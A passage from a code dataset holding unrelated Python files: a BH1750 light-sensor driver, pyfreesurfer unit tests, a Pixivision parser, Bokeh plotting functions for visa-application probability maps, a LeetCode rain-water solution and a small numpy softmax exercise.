mandatory\")\r\n\r\n def power_on(self):\r\n self._i2c.writeto(self._address, bytes([0x01]))\r\n\r\n def power_off(self):\r\n self._i2c.writeto(self._address, bytes([0x00]))\r\n\r\n def reset(self):\r\n self._i2c.writeto(self._address, bytes([0x07]))\r\n\r\n def set_mode(self,mode_code = None):\r\n if mode_code == None:\r\n print(\"Please write a mode code\\n\"\r\n \"->Mode codes :\\n\"\r\n \"\\'CHR\\' for Continuous High Resolution Mode\\n\"\r\n \"\\'CHR2\\' for Continuous High Resolution Mode 2\\n\"\r\n \"\\'CLR\\' for Continuous Low Resolution Mode\\n\"\r\n \"\\'OHR\\' for One Time High Resolution Mode\\n\"\r\n \"\\'OHR2\\' for One Time High Resolution Mode\\n\"\r\n \"\\'OLR\\' for One Time Low Resolution Mode\\n\")\r\n else:\r\n new_mode = MODE_DICT.get(mode_code)\r\n if new_mode is None :\r\n raise ValueError(\"\\nPlease write an available mode code\\n\"\r\n \"->Mode codes :\\n\"\r\n \"\\'CHR\\' for Continuous High Resolution Mode\\n\"\r\n \"\\'CHR2\\' for Continuous High Resolution Mode 2\\n\"\r\n \"\\'CLR\\' for Continuous Low Resolution Mode\\n\"\r\n \"\\'OHR\\' for One Time High Resolution Mode\\n\"\r\n \"\\'OHR2\\' for One Time High Resolution Mode\\n\"\r\n \"\\'OLR\\' for One Time Low Resolution Mode\\n\")\r\n if new_mode & 0x20:\r\n self._mode = new_mode;\r\n self._i2c.writeto(self._address, bytes([self._mode]))\r\n else:\r\n if new_mode != self._mode:\r\n self._mode = new_mode;\r\n self._i2c.writeto(self._address, bytes([self._mode]))\r\n\r\n\r\n\r\n\r\n def lux(self):\r\n if self._mode is None:\r\n raise ValueError(\"\\nNo mode selected !\\nPlease chose a mode with set_mode method !\")\r\n return\r\n\r\n sleep_us(24 if self._mode in (0x13, 0x23) else 180)\r\n data = self._i2c.readfrom(self._address, 2)\r\n factor = 2.0 if self._mode in (0x11, 0x21) else 1.0\r\n\r\n return (data[0] << 8 | data[1]) / (1.2 * factor)","sub_path":"libs/modbus_bh1750/lib/bh1750.py","file_name":"bh1750.py","file_ext":"py","file_size_in_byte":3897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"564336840","text":"##########################################################################\n# NSAp - Copyright (C) CEA, 2016\n# Distributed under the terms of the CeCILL-B license, as published by\n# the CEA-CNRS-INRIA. Refer to the LICENSE file or to\n# http://www.cecill.info/licences/Licence_CeCILL-B_V1-en.html\n# for details.\n##########################################################################\n\n# System import\nfrom collections import namedtuple\nimport unittest\nimport sys\nimport math\nimport numpy\n# COMPATIBILITY: since python 3.3 mock is included in unittest module\npython_version = sys.version_info\nif python_version[:2] <= (3, 3):\n import mock\n from mock import patch\n mock_builtin = \"__builtin__\"\nelse:\n import unittest.mock as mock\n from unittest.mock import patch\n mock_builtin = \"builtins\"\n\n# Pyfreesurfer import\nfrom pyfreesurfer.utils.surftools import apply_affine_on_mesh\nfrom pyfreesurfer.utils.filetools import TriSurface\n\n\nclass FreeSurferTriSurface(unittest.TestCase):\n \"\"\" Test the triangular surface structure:\n 'pyfreesurfer.utils.surftools.TriSurface'\n \"\"\"\n def setUp(self):\n \"\"\" Define function parameters.\n \"\"\"\n # Construct an eight-sided polyhedron.\n f = math.sqrt(2.0) / 2.0\n verts = [\n (0, -1, 0),\n (-f, 0, f),\n (f, 0, f),\n (f, 0, -f),\n (-f, 0, -f),\n (0, 1, 0)]\n faces = [\n (0, 2, 1),\n (0, 3, 2),\n (0, 4, 3),\n (0, 1, 4),\n (5, 1, 2),\n (5, 2, 3),\n (5, 3, 4),\n (5, 4, 1)]\n labels = range(6)\n meta = dict((index, {\"color\": (1, 1, 1, 1)}) for index in labels)\n\n self.kwargs = {\n \"vertices\": numpy.asarray(verts),\n \"triangles\": numpy.asarray(faces),\n \"inflated_vertices\": numpy.asarray(verts)\n }\n\n def test_normal_execution(self):\n \"\"\" Test the normal behaviour of the function.\n \"\"\"\n # Test execution\n surf = TriSurface(**self.kwargs)\n self.assertTrue(numpy.allclose(self.kwargs[\"vertices\"],\n surf.vertices))\n self.assertTrue(numpy.allclose(self.kwargs[\"triangles\"],\n surf.triangles))\n self.assertTrue(numpy.allclose(self.kwargs[\"inflated_vertices\"],\n surf.inflated_vertices))\n self.assertEqual(surf.shape(), (6, 18, 8))\n\n\nclass FreeSurferApplyAffine(unittest.TestCase):\n \"\"\" Test the apply affine transformation to vertices function:\n 'pyfreesurfer.utils.surftools.apply_affine_on_mesh'\n \"\"\"\n def setUp(self):\n \"\"\" Define function parameters.\n \"\"\"\n # Construct an eight-sided polyhedron.\n f = math.sqrt(2.0) / 2.0\n verts = [\n (0, -1, 0),\n (-f, 0, f),\n (f, 0, f),\n (f, 0, -f),\n (-f, 0, -f),\n (0, 1, 0)]\n faces = [\n (0, 2, 1),\n (0, 3, 2),\n (0, 4, 3),\n (0, 1, 4),\n (5, 1, 2),\n (5, 2, 3),\n (5, 3, 4),\n (5, 4, 1)]\n labels = range(6)\n meta = dict((index, {\"color\": (1, 1, 1, 1)}) for index in labels)\n\n self.kwargs = {\n \"vertices\": numpy.asarray(verts),\n \"affine\": numpy.eye(4)\n }\n\n def test_normal_execution(self):\n \"\"\" Test the normal behaviour of the function.\n \"\"\"\n # Test execution\n warp_vertex = apply_affine_on_mesh(**self.kwargs)\n self.assertTrue(numpy.allclose(self.kwargs[\"vertices\"], warp_vertex))\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"pyfreesurfer/tests/test_utils/test_surftools.py","file_name":"test_surftools.py","file_ext":"py","file_size_in_byte":3719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"85052649","text":"from omega_miya.database import DBPixivision, Result\nfrom omega_miya.utils.pixiv_utils import PixivisionArticle\n\n\nasync def pixivsion_article_parse(aid: int, tags: list) -> Result.DictResult:\n article_result = await PixivisionArticle(aid=aid).get_article_info()\n if article_result.error:\n return Result.DictResult(error=True, info=article_result.info, result={})\n\n try:\n if not tags:\n tags = [x.get('tag_name') for x in article_result.result.get('tags_list')]\n\n article_info = dict(article_result.result)\n\n title = str(article_info['article_title'])\n description = str(article_info['article_description'])\n url = f'https://www.pixivision.net/zh/a/{aid}'\n illusts_list = []\n\n for illust in article_info['illusts_list']:\n illusts_list.append(int(illust['illusts_id']))\n\n pixivision = DBPixivision(aid=aid)\n db_res = await pixivision.add(title=title, description=description,\n tags=repr(tags), illust_id=repr(illusts_list), url=url)\n if db_res.success():\n __res = {\n 'title': title,\n 'description': description,\n 'url': url,\n 'image:': article_info['article_eyecatch_image'],\n 'illusts_list': illusts_list\n }\n result = Result.DictResult(error=False, info='Success', result=__res)\n else:\n result = Result.DictResult(error=True, info=db_res.info, result={})\n except Exception as e:\n result = Result.DictResult(error=True, info=repr(e), result={})\n return result\n","sub_path":"omega_miya/plugins/pixivsion_monitor/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"78853975","text":"import pandas as pd\nimport numpy as np\nfrom bokeh.plotting import curdoc, figure, save, output_file, gridplot, vplot, show, ColumnDataSource\nimport bokeh.palettes as palette\nfrom bokeh.palettes import Blues8\nfrom bokeh.models import Range1d\nfrom bokeh.models import CustomJS, HoverTool, ColorBar, LinearColorMapper, layouts, FixedTicker\nfrom bokeh.models.widgets import Slider, TextInput\nfrom bokeh.embed import components\nfrom bokeh.layouts import gridplot, row, column, widgetbox\nfrom bokeh.models import BoxSelectTool, LassoSelectTool, Spacer, PrintfTickFormatter\nfrom bokeh.models.glyphs import Segment\nimport copy\n\ndef world_map(countrypdf, countries):\n \n countryObject = {}\n for country in countries['features']:\n \n geometry_type = country['geometry']['type']\n country_xs = []\n country_ys = []\n if country['id'] in countrypdf.index:\n if geometry_type == \"MultiPolygon\":\n i = 0\n for poly_coords in country['geometry']['coordinates']:\n coords = poly_coords[0]\n country_xs.extend(x[0] for x in coords)\n country_ys.extend(x[1] for x in coords)\n countryObject[country['id'] + '_{:d}'.format(i)] = {\n 'x': [x[0] for x in coords],\n 'y': [x[1] for x in coords],\n 'p': countrypdf.loc[country['id']].tolist()[0]\n }\n i = i + 1\n else:\n coords = country['geometry']['coordinates'][0]\n countryObject[country['id'] + '_0'] = {\n 'x': [x[0] for x in coords],\n 'y': [x[1] for x in coords],\n 'p': countrypdf.loc[country['id']].tolist()[0]\n }\n\n df = pd.DataFrame(countryObject)\n \n colormap =cm.get_cmap(\"RdPu\")\n p = figure(\n width = 700,\n height=350,\n title='',\n x_axis_label='Longitude',\n y_axis_label='Latitude',\n webgl=True\n )\n \n countryprobs = countrypdf[0].tolist()\n crange = np.linspace(np.min(countryprobs), np.max(countryprobs), 100)\n irange = np.linspace(0, 1, 100)\n A_color=colormap(irange,1,True)\n # convert to hex to fit to bokeh\n bokeh_colors = [\"#%02x%02x%02x\" % (r, g, b) for r, g, b in A_color[:,0:3]]\n \n for (index,country) in enumerate(df):\n val, idx = min((val, idx) for (idx, val) in enumerate(abs(crange - df[country]['p'])))\n p.patch(\n x=df[country]['x'],\n y=df[country]['y'],\n color=bokeh_colors[idx],\n alpha = .5\n )\n p.x_range = Range1d(start = -180, end = 180)\n p.y_range = Range1d(start = -90, end = 90)\n\n script, div = components(p)\n\n return script, div\n\ndef new_world_map(countrypdf, countries):\n \n countryObject = {}\n for country in countries['features']:\n \n geometry_type = country['geometry']['type']\n country_xs = []\n country_ys = []\n if country['id'] in countrypdf.index:\n if geometry_type == \"MultiPolygon\":\n i = 0\n for poly_coords in country['geometry']['coordinates']:\n coords = poly_coords[0]\n country_xs.extend(x[0] for x in coords)\n country_ys.extend(x[1] for x in coords)\n countryObject[country['id'] + '_{:d}'.format(i)] = {\n 'x': [x[0] for x in coords],\n 'y': [x[1] for x in coords],\n 'p': countrypdf.loc[country['id'],'ar'],\n 'v': countrypdf.loc[country['id'],'val'],\n 'perc': countrypdf.loc[country['id'],'ar'] * 100,\n 'name': country['properties']['name']\n }\n i = i + 1\n else:\n coords = country['geometry']['coordinates'][0]\n countryObject[country['id'] + '_0'] = {\n 'x': [x[0] for x in coords],\n 'y': [x[1] for x in coords],\n 'p': countrypdf.loc[country['id'],'ar'],\n 'v': countrypdf.loc[country['id'],'val'],\n 'perc': countrypdf.loc[country['id'],'ar'] * 100,\n 'name': country['properties']['name']\n }\n\n country_xs = [country['x'] for country in countryObject.values()]\n country_ys = [country['y'] for country in countryObject.values()]\n country_ps = [country['p'] for country in countryObject.values()]\n country_vs = [country['v'] for country in countryObject.values()]\n country_percs = [country['perc'] for country in countryObject.values()]\n country_names = [country['name'] for country in countryObject.values()]\n\n df = pd.DataFrame(countryObject)\n source = ColumnDataSource(data=dict(\n x=country_xs,\n y=country_ys,\n p=country_ps,\n v=country_vs,\n perc=country_percs,\n name=country_names))\n\n Blues8.reverse()\n color_mapper = LinearColorMapper(palette=Blues8, low=0.5, high=1.0)\n TOOLS=\"pan,wheel_zoom,box_zoom,reset,hover,save\"\n\n p = figure(width = 700, height=350, title='', x_axis_label='Longitude', y_axis_label='Latitude', webgl=True,\n tools=TOOLS)\n p.patches('x', 'y', source=source,\n fill_color={'field': 'p', 'transform': color_mapper},\n fill_alpha=0.5, line_color=\"white\", line_width=0.5)\n p.x_range = Range1d(start = -180, end = 180)\n p.y_range = Range1d(start = -90, end = 90)\n \n hover = p.select(HoverTool)\n hover.point_policy = \"follow_mouse\"\n hover.tooltips = [(\"Country\", \"@name\"), (\"Acceptance Rate\", \"@perc%\"), (\"Applications\", \"@v\"),]\n \n color_bar = ColorBar(color_mapper=color_mapper, orientation='vertical',\n location='bottom_left', scale_alpha=0.5,\n ticker=FixedTicker(ticks=[0.5, 0.6, 0.7, 0.8, 0.9, 1.0]))\n p.add_layout(color_bar)\n\n script, div = components(p)\n\n return script, div\n\ndef temp_world_map(countrypdf, countries):\n \n countryObject = {}\n for country in countries['features']:\n \n geometry_type = country['geometry']['type']\n country_xs = []\n country_ys = []\n if country['id'] in countrypdf.index:\n if geometry_type == \"MultiPolygon\":\n i = 0\n for poly_coords in country['geometry']['coordinates']:\n coords = poly_coords[0]\n country_xs.extend(x[0] for x in coords)\n country_ys.extend(x[1] for x in coords)\n countryObject[country['id'] + '_{:d}'.format(i)] = {\n 'x': [x[0] for x in coords],\n 'y': [x[1] for x in coords],\n 'p': countrypdf.loc[country['id'],'ar'],\n 'perc': countrypdf.loc[country['id'],'ar'] * 100,\n 'name': country['properties']['name']\n }\n i = i + 1\n else:\n coords = country['geometry']['coordinates'][0]\n countryObject[country['id'] + '_0'] = {\n 'x': [x[0] for x in coords],\n 'y': [x[1] for x in coords],\n 'p': countrypdf.loc[country['id'],'ar'],\n 'perc': countrypdf.loc[country['id'],'ar'] * 100,\n 'name': country['properties']['name']\n }\n\n country_xs = [country['x'] for country in countryObject.values()]\n country_ys = [country['y'] for country in countryObject.values()]\n country_ps = [country['p'] for country in countryObject.values()]\n country_percs = [country['perc'] for country in countryObject.values()]\n country_names = [country['name'] for country in countryObject.values()]\n\n df = pd.DataFrame(countryObject)\n source = ColumnDataSource(data=dict(\n x=country_xs,\n y=country_ys,\n p=country_ps,\n perc=country_percs,\n name=country_names))\n\n #Blues8.reverse()\n color_mapper = LinearColorMapper(palette=Blues8, low=0.0, high=1.0)\n TOOLS=\"pan,wheel_zoom,box_zoom,reset,hover,save\"\n\n p = figure(width = 700, height=350, title='', x_axis_label='Longitude', y_axis_label='Latitude', webgl=True,\n tools=TOOLS)\n p.patches('x', 'y', source=source,\n fill_color={'field': 'p', 'transform': color_mapper},\n fill_alpha=0.5, line_color=\"white\", line_width=0.5)\n p.x_range = Range1d(start = -180, end = 180)\n p.y_range = Range1d(start = -90, end = 90)\n \n hover = p.select(HoverTool)\n hover.point_policy = \"follow_mouse\"\n hover.tooltips = [(\"Country\", \"@name\"), (\"Industry, value added\", \"@p\"),]\n \n color_bar = ColorBar(color_mapper=color_mapper, orientation='vertical',\n location='bottom_left', scale_alpha=0.5,\n ticker=FixedTicker(ticks=[0.0, 0.2, 0.4, 0.6, 0.8, 1.0]))\n p.add_layout(color_bar)\n\n script, div = components(p)\n\n return script, div\n\n\ndef prob_widget_plot(singleval, dft, cfr, cfr_audit):\n\n singleval = pd.DataFrame(data = singleval, index=[0])\n X = dft.transform(singleval)\n prob = cfr.predict_proba(X)[0][1]\n prob_audit = cfr_audit.predict_proba(X)[0][1]\n \n ## And now plot based on probabilities\n factors = [\"Failure\", \"Success\"]\n x = [100.0*(1.0 - prob), 100.0*prob]\n source = ColumnDataSource(data=dict(x0=[0]*2, y0=factors, x1=x, y1=factors,))\n\n ## Application Success\n app = figure(title=\"Application Success\", tools=\"\", toolbar_location=None,\n y_range=factors, x_range=[0,100], plot_width=400, plot_height=200, webgl=True)\n\n glyph = Segment(x0=\"x0\", y0=\"y0\", x1=\"x1\", y1=\"y1\", line_width=20, line_color=\"blue\", line_alpha=0.5)\n app.add_glyph(source, glyph)\n\n #app.segment(source=source, line_width=20, line_color=\"blue\", line_alpha=0.5)\n \n ## Probability of being audited\n factors = [\"No Audit\", \"Audit\"]\n x = [100.0*(1.0 - prob_audit), 100.0*prob_audit]\n\n audit = figure(title=\"Audit Probability\", tools=\"\", toolbar_location=None,\n y_range=factors, x_range=[0,100], plot_width=400, plot_height=200, webgl=True)\n \n audit.segment(0, factors, x, factors, line_width=20, line_color=\"blue\", line_alpha=0.5)\n \n callback = CustomJS(args=dict(source=source), code=\"\"\"\n var data = source.get('data');\n var f = cb_obj.get('value')\n x1 = data['x1']\n x1[1] = 100.0 * (1.1 - 0.5 * f**(-1.0/10.0))\n x1[0] = 100.0 * (1.0 - (1.1 - 0.5 * f**(-1.0/10.0)))\n source.trigger('change');\n \"\"\")\n \n #def callback(source=source, window=None):\n #data = source.get('data')\n #f = float(cb_obj.get('value'))\n #x1 = data['x1']\n #singleval.loc[0,'wage'] = f\n #X = dft.transform(singleval)\n #prob = cfr.predict_proba(X)[0][1]\n\n #data['x1'][1] = 100.0 * (1.1 - 0.5 * f**(-1.0/10.0))\n #data['x1'][0] = 100.0 * (1.0 - (1.1 - 0.5 * f**(-1.0/10.0)))\n #source.trigger('change')\n \n #wage = Slider(title=\"Expected Wage\", value=100000.0, start=0.0, end=500000.0, step=10000.0, callback=callback)\n wage = TextInput(title=\"Expected Wage ($)\", value='100000', callback=callback)\n\n p = row(column(app, audit), wage)\n script, div = components(p)\n\n return script, div, prob, prob_audit\n\ndef convert_indices(record, state_i, country_i):\n\n dftemp = pd.merge(record, state_i, on=['state', 'int_year'], how='left')\n tlist = [col for col in dftemp.columns if 'bea' in col]\n dftemp[tlist] = dftemp[tlist].fillna(dftemp[tlist].mean()).dropna(axis=1, how='all')\n record_out = pd.merge(dftemp, country_i, on=['isos', 'int_year'], how='left')\n tlist = [col for col in dftemp.columns if 'WB_' in col]\n record_out[tlist] = record_out[tlist].fillna(record_out[tlist].mean()).dropna(axis=1, how='all')\n\n return record_out\n\ndef prob_calc(globalval, dft, cfr, state_i, country_i):\n \n singleval = copy.deepcopy(globalval)\n singleval = pd.DataFrame(data = singleval, index=[0])\n singleval = convert_indices(singleval, state_i, country_i)\n X = dft.transform(singleval)\n prob = cfr.predict_proba(X)[0][1]\n #prob_audit = cfr_audit.predict_proba(X)[0][1]\n\n return prob\n\ndef prob_feat_calc(globalval, rangerecord, dft, cfr, ref_prob, state_i, country_i):\n \n probrange = copy.deepcopy(globalval)\n total = 0.0\n maxprob = 0.0\n maxkey = 0.0\n maxval = 0.0\n \n ckeys = ['online', 'no_lawyer', 'state']\n cmsgs = {'online': 'we recommend that you try submitting your application online.',\n 'no_lawyer': 'we recommend that you seek the assistance of a lawyer.',\n 'state': 'have you considered applying for a job in a different state, like '}\n \n for k,vals in rangerecord.iteritems():\n \n probs = []\n nrep = len(vals)\n tempval = {}\n for ka, v in globalval.iteritems():\n if ka == k:\n tempval[ka] = vals\n else:\n tempval[ka] = [v] * nrep\n singleval = pd.DataFrame(data = tempval)\n singleval = convert_indices(singleval, state_i, country_i)\n X = dft.transform(singleval)\n probs = cfr.predict_proba(X)[:,1]\n if k in ckeys:\n rel_prob = max(probs) - ref_prob\n if rel_prob > maxprob:\n maxprob = rel_prob\n maxkey = k\n maxval = vals[np.argmax(probs)]\n probrange[k] = max(probs) - min(probs)\n total += probrange[k]\n \n for k,vals in rangerecord.iteritems():\n \n probrange[k] = probrange[k] / total\n\n #print probrange\n #probrange = [{\"label\":k,\"value\":v} for k,v in probrange.iteritems() if v > 0.0]\n \n if maxprob > 0.0:\n if maxkey == 'state':\n msg = 'To increase your chances, ' + cmsgs[maxkey] + maxval.title() + '.'\n else:\n msg = 'To increase your chances, ' + cmsgs[maxkey]\n else:\n msg = ''\n\n return probrange, msg, maxprob\n\ndef prob_plot(singleval, dft, cfr, cfr_audit):\n\n singleval = pd.DataFrame(data = singleval, index=[0])\n X = dft.transform(singleval)\n prob = cfr.predict_proba(X)[0][1]\n prob_audit = cfr_audit.predict_proba(X)[0][1]\n \n ## And now plot based on probabilities\n factors = [\"Failure\", \"Success\"]\n x = [100.0*(1.0 - prob), 100.0*prob]\n source = ColumnDataSource(data=dict(x0=[0]*2, y0=factors, x1=x, y1=factors,))\n\n ## Application Success\n app = figure(title=\"Application Success\", tools=\"\", toolbar_location=None,\n y_range=factors, x_range=[0,100], plot_width=700, plot_height=200, webgl=True)\n\n glyph = Segment(x0=\"x0\", y0=\"y0\", x1=\"x1\", y1=\"y1\", line_width=20, line_color=\"blue\", line_alpha=0.5)\n app.add_glyph(source, glyph)\n\n #app.segment(source=source, line_width=20, line_color=\"blue\", line_alpha=0.5)\n \n ## Probability of being audited\n factors = [\"No Audit\", \"Audit\"]\n x = [100.0*(1.0 - prob_audit), 100.0*prob_audit]\n\n audit = figure(title=\"Audit Probability\", tools=\"\", toolbar_location=None,\n y_range=factors, x_range=[0,100], plot_width=700, plot_height=200, webgl=True)\n \n audit.segment(0, factors, x, factors, line_width=20, line_color=\"blue\", line_alpha=0.5)\n\n p = column(app, audit)\n script, div = components(p)\n\n return script, div, prob, prob_audit\n\ndef single_cat(data, col1, c1min, c1max, l1):\n \n datalim = data[(data[col1] <= c1max)]\n data_acc = datalim[datalim['accept'] == 1]\n data_den = datalim[datalim['accept'] == 0]\n x = data_acc[col1].tolist()\n xb = data_den[col1].tolist()\n\n # create the horizontal histogram\n hhist, hedges = np.histogram(x, bins=70, normed=False)\n hedges = [np.exp(a) / 1000.0 for a in hedges]\n hzeros = np.zeros(len(hedges)-1)\n hbhist, hbedges = np.histogram(xb, bins=70, normed=False)\n hbedges = [np.exp(a) / 1000.0 for a in hbedges]\n hbzeros = np.zeros(len(hbedges)-1)\n hmax = max(hhist)*1.1\n hbmax = max(hbhist)*1.1\n hmax = max([hmax, hbmax])\n\n LINE_ARGS = dict(color=\"#ff0000\", line_color=None)\n\n TOOLS=\"pan,wheel_zoom,box_select,lasso_select,reset\"\n ph = figure(tools=TOOLS, toolbar_location=\"above\", plot_width=700, plot_height=500,\n x_range=(np.exp(c1min) / 1000.0, np.exp(c1max) / 1000.0),\n x_axis_type=\"log\", y_range=(0, hmax), min_border=10, min_border_left=50, y_axis_location=\"right\", x_axis_label = l1, y_axis_label = 'Number of Applications', webgl=True)\n ph.xgrid.grid_line_color = None\n ph.yaxis.major_label_orientation = np.pi/4\n ph.background_fill_color = \"#ffffff\"\n\n ph.quad(bottom=0, left=hedges[:-1], right=hedges[1:], top=hhist, color=\"white\", line_color=\"#ff0000\")\n ph.quad(bottom=0, left=hbedges[:-1], right=hbedges[1:], top=hbhist, alpha=0.5,\n color=\"#0000ff\", line_color=None)\n #ph.legend.location = \"top_right\"\n ph.yaxis[0].ticker.desired_num_ticks = 3\n ph.xaxis[0].ticker=FixedTicker(ticks=[10,20,50,100,200,500])\n ph.xaxis[0].formatter = PrintfTickFormatter(format=\"$ %4fk\")\n ph.yaxis[0].formatter = PrintfTickFormatter(format=\"%4.1e\")\n\n script, div = components(ph)\n\n return script, div\n\ndef double_cat(data, col1, col2, c1max, c2max, l1, l2):\n \n datalim = data[np.logical_and(data[col1] <= c1max, data[col2] <= c2max)]\n data_acc = datalim[datalim['accept'] == 1]\n data_den = datalim[datalim['accept'] == 0]\n x = data_acc[col1].tolist()\n y = data_acc[col2].tolist()\n xb = data_den[col1].tolist()\n yb = data_den[col2].tolist()\n\n TOOLS=\"pan,wheel_zoom,box_select,lasso_select,reset\"\n\n # create the scatter plot\n p = figure(tools=TOOLS, plot_width=500, plot_height=500, min_border=10, min_border_left=50,\n toolbar_location=\"above\",\n title=\"\", webgl=True)\n p.background_fill_color = \"#ffffff\"\n p.select(BoxSelectTool).select_every_mousemove = False\n p.select(LassoSelectTool).select_every_mousemove = False\n\n r = p.scatter(x, y, size=3, color=\"#ff0000\", alpha=0.5, legend=\"Accepted\")\n rb = p.scatter(xb, yb, size=3, color=\"#0000ff\", alpha=0.5, legend=\"Denied\")\n p.legend.location = \"bottom_right\"\n\n # create the horizontal histogram\n hhist, hedges = np.histogram(x, bins=20, normed=True)\n hzeros = np.zeros(len(hedges)-1)\n hbhist, hbedges = np.histogram(xb, bins=20, normed=True)\n hbzeros = np.zeros(len(hbedges)-1)\n hmax = max(hhist)*1.1\n hbmax = max(hbhist)*1.1\n hmax = max([hmax, hbmax])\n\n LINE_ARGS = dict(color=\"#ff0000\", line_color=None)\n\n ph = figure(toolbar_location=None, plot_width=p.plot_width, plot_height=200, x_range=p.x_range,\n y_range=(-hmax, hmax), min_border=10, min_border_left=50, y_axis_location=\"right\", x_axis_label = l1, webgl=True)\n ph.xgrid.grid_line_color = None\n ph.yaxis.major_label_orientation = np.pi/4\n ph.background_fill_color = \"#ffffff\"\n\n ph.quad(bottom=0, left=hedges[:-1], right=hedges[1:], top=hhist, color=\"white\", line_color=\"#ff0000\")\n ph.quad(bottom=0, left=hbedges[:-1], right=hbedges[1:], top=hbhist, alpha=0.5, color=\"#0000ff\", line_color=None)\n hh1 = ph.quad(bottom=0, left=hedges[:-1], right=hedges[1:], top=hzeros, alpha=0.5, **LINE_ARGS)\n hh2 = ph.quad(bottom=0, left=hedges[:-1], right=hedges[1:], top=hzeros, alpha=0.1, **LINE_ARGS)\n ph.yaxis[0].ticker.desired_num_ticks = 3\n ph.xaxis[0].formatter = PrintfTickFormatter(format=\"%4.1e\")\n ph.yaxis[0].formatter = PrintfTickFormatter(format=\"%4.1e\")\n\n # create the vertical histogram\n vhist, vedges = np.histogram(y, bins=20, normed=True)\n vzeros = np.zeros(len(vedges)-1)\n vbhist, vbedges = np.histogram(yb, bins=20, normed=True)\n vbzeros = np.zeros(len(vbedges)-1)\n vmax = max(vhist)*1.1\n vbmax = max(vbhist)*1.1\n vmax = max([vmax, vbmax])\n\n pv = figure(toolbar_location=None, plot_width=200, plot_height=p.plot_height, x_range=(-vmax, vmax),\n y_range=p.y_range, min_border=10, y_axis_location=\"right\", y_axis_label= l2, webgl=True)\n pv.ygrid.grid_line_color = None\n pv.xaxis.major_label_orientation = np.pi/4\n pv.background_fill_color = \"#ffffff\"\n\n pv.quad(left=0, bottom=vedges[:-1], top=vedges[1:], right=vhist, color=\"white\", line_color=\"#ff0000\")\n pv.quad(left=0, bottom=vbedges[:-1], top=vbedges[1:], right=vbhist, alpha = 0.5, color=\"#0000ff\", line_color=None)\n vh1 = pv.quad(left=0, bottom=vedges[:-1], top=vedges[1:], right=vzeros, alpha=0.5, **LINE_ARGS)\n vh2 = pv.quad(left=0, bottom=vedges[:-1], top=vedges[1:], right=vzeros, alpha=0.1, **LINE_ARGS)\n pv.xaxis[0].ticker.desired_num_ticks = 3\n #pv.yaxis[0].formatter = PrintfTickFormatter(format=\"%4.1e\")\n pv.xaxis[0].formatter = PrintfTickFormatter(format=\"%4.1e\")\n\n layout = column(row(p, pv), row(ph, Spacer(width=200, height=200)))\n \n def update(attr, old, new):\n inds = np.array(new['1d']['indices'])\n if len(inds) == 0 or len(inds) == len(x):\n hhist1, hhist2 = hzeros, hzeros\n vhist1, vhist2 = vzeros, vzeros\n else:\n neg_inds = np.ones_like(x, dtype=np.bool)\n neg_inds[inds] = False\n hhist1, _ = np.histogram(x[inds], bins=hedges)\n vhist1, _ = np.histogram(y[inds], bins=vedges)\n hhist2, _ = np.histogram(x[neg_inds], bins=hedges)\n vhist2, _ = np.histogram(y[neg_inds], bins=vedges)\n\n hh1.data_source.data[\"top\"] = hhist1\n hh2.data_source.data[\"top\"] = -hhist2\n vh1.data_source.data[\"right\"] = vhist1\n vh2.data_source.data[\"right\"] = -vhist2\n\n r.data_source.on_change('selected', update)\n\n script, div = components(layout)\n\n return script, div","sub_path":"heroku_app/plots.py","file_name":"plots.py","file_ext":"py","file_size_in_byte":21930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"330777728","text":"\"\"\"\nAuthor: Jing (https://github.com/gnijuohz)\n\nTrapping Rain Water: https://oj.leetcode.com/problems/trapping-rain-water \n\n\nGiven n non-negative integers representing an elevation map where the width of each bar is 1, compute how much water it is able to trap after raining. \n\n\n\nFor example, \nGiven [0,1,0,2,1,0,1,3,2,1,2,1], return 6.\n\n\n\n\nThe above elevation map is represented by array [0,1,0,2,1,0,1,3,2,1,2,1]. In this case, 6 units of rain water (blue section) are being trapped. Thanks Marcos for contributing this image! \nTags\nArray, Stack, Two Pointers \n\"\"\"\n\nclass Solution:\n # @param A, a list of integers\n # @return an integer\n def trap(self, A):\n res = []\n if len(A) <= 2:\n return 0\n for i in range(len(A)):\n if i == 0 and A[i] > A[i+1]:\n res.append(i)\n elif i == len(A)-1:\n if A[i] > A[i-1]:\n while len(res) >= 2 and A[i] > A[res[-1]] and A[res[-1]] <= A[res[-2]]:\n res.pop()\n res.append(i)\n elif A[i] >= A[i-1] and A[i] >= A[i+1]:\n while len(res) >=2 and A[i] >= A[res[-1]] and A[res[-1]] <= A[res[-2]]:\n res.pop()\n res.append(i)\n if len(res) < 2:\n return 0\n num = 0\n for i in range(len(res)-1):\n for j in A[res[i]+1:res[i+1]]:\n num += max(0, min(A[res[i]],A[res[i+1]])-j)\n return num\n \n ","sub_path":"solutions/Trapping-Rain-Water.py","file_name":"Trapping-Rain-Water.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"516201197","text":"# coding:utf-8\n'''\nCreated on 2017/10/31.\n\n@author: chk01\n'''\nimport numpy as np\n\n\ndef normalize(x):\n # axis=1 行\n x_norm = np.linalg.norm(x, axis=1, keepdims=True)\n x = x / x_norm\n\n return x\n\n\ndef softmax(x):\n x_exp = np.exp(x)\n x_sum = np.sum(x_exp, axis=1, keepdims=True)\n s = x_exp / x_sum\n return s\n\n\ndef L1(yhat, y):\n loss = np.sum(np.abs(y - yhat))\n return loss\n\n\ndef L2(yhat, y):\n loss = np.dot((y - yhat), (y - yhat).T)\n return loss\n\n\nif __name__ == '__main__':\n x = np.array([\n [9, 2, 5, 0, 0],\n [7, 5, 0, 0, 0]])\n yhat = np.array([.9, 0.2, 0.1, .4, .9])\n y = np.array([1, 0, 0, 1, 1])\n print(softmax(x))\n print(\"L1 = \" + str(L1(yhat, y)))\n print(\"L2 = \" + str(L2(yhat, y)))\n","sub_path":"Andrew_NG_learning/class_one/week_two/Dxq_1.py","file_name":"Dxq_1.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"585662647","text":"\r\nimport os\r\nimport 